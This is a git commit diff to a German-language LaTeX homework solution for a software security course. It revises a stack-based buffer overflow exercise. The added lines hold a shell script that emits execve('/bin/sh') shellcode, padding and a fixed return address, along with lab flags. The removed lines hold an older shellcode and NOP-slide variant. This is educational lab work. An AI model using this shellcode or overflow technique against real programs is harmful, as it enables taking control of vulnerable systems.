[Assignment-6] Nachtrag Task 6
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 49s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 47s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 22s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 6s
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 49s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 47s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 22s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 6s
This commit is contained in:
parent
61c2d83c03
commit
459d71216a
GPG key ID:
B471A1AF06C895FD
1 changed files with 6 additions and 21 deletions
|
|
@ -139,38 +139,23 @@
|
||||||
|
|
||||||
\begin{exercise}[Stack-Based Buffer Overflow]{6}
|
\begin{exercise}[Stack-Based Buffer Overflow]{6}
|
||||||
\begin{subexercises}
|
\begin{subexercises}
|
||||||
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird:\\
|
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird. Die Flag lautet \lstinline|flag{THAT_WAS_EASY_HUH}|.\\
|
||||||
\begin{lstlisting}[language=Bash]
|
\begin{lstlisting}[language=Bash]
|
||||||
#!/usr/bin/env sh
|
#!/usr/bin/env sh
|
||||||
|
|
||||||
# 28 Byte Shellcode
|
# 21 Byte Shellcode
|
||||||
SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
SHELLCODE="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||||||
# Padding to fill:
|
# Padding to fill:
|
||||||
# - 72 Bytes to fill buff
|
# - 79 Bytes to fill buff
|
||||||
# - 8 Bytes to fill the local variables before buff
|
# - 8 Bytes to fill the local variables before buff
|
||||||
# - 4 Bytes to fill the saved ebp value
|
# - 4 Bytes to fill the saved ebp value
|
||||||
PADDING=$(printf "A%.0s" $(seq 1 84))
|
PADDING=$(printf "A%.0s" $(seq 1 91))
|
||||||
# Address of the start of the buff array / shellcode
|
# Address of the start of the buff array / shellcode
|
||||||
RETADDR="\x1C\xDB\xFF\xFF"
|
RETADDR="\x1C\xDB\xFF\xFF"
|
||||||
|
|
||||||
printf $SHELLCODE$PADDING$RETADDR
|
printf $SHELLCODE$PADDING$RETADDR
|
||||||
\end{lstlisting}
|
\end{lstlisting}
|
||||||
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell im Anschluss an eine NOP-Slide ausgeführt wird.:\\
|
\item Die Flag lautet \lstinline|flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}|.\\
|
||||||
\begin{lstlisting}[language=Bash]
|
|
||||||
#!/usr/bin/env sh
|
|
||||||
|
|
||||||
# 28 Byte Shellcode
|
|
||||||
SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
|
||||||
# NOP-Slide to fill:
|
|
||||||
# - 72 Bytes to fill buff
|
|
||||||
# - 8 Bytes to fill the local variables before buff
|
|
||||||
# - 4 Bytes to fill the saved ebp value
|
|
||||||
PADDING=$(printf "\\\\0x90%.0s" $(seq 1 84))
|
|
||||||
# Address of the start of the buff array / shellcode
|
|
||||||
RETADDR="\x1C\xDB\xFF\xFF"
|
|
||||||
|
|
||||||
printf $PADDING$SHELLCODE$RETADDR
|
|
||||||
\end{lstlisting}
|
|
||||||
\end{subexercises}
|
\end{subexercises}
|
||||||
\end{exercise}
|
\end{exercise}
|
||||||
\end{document}
|
\end{document}
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue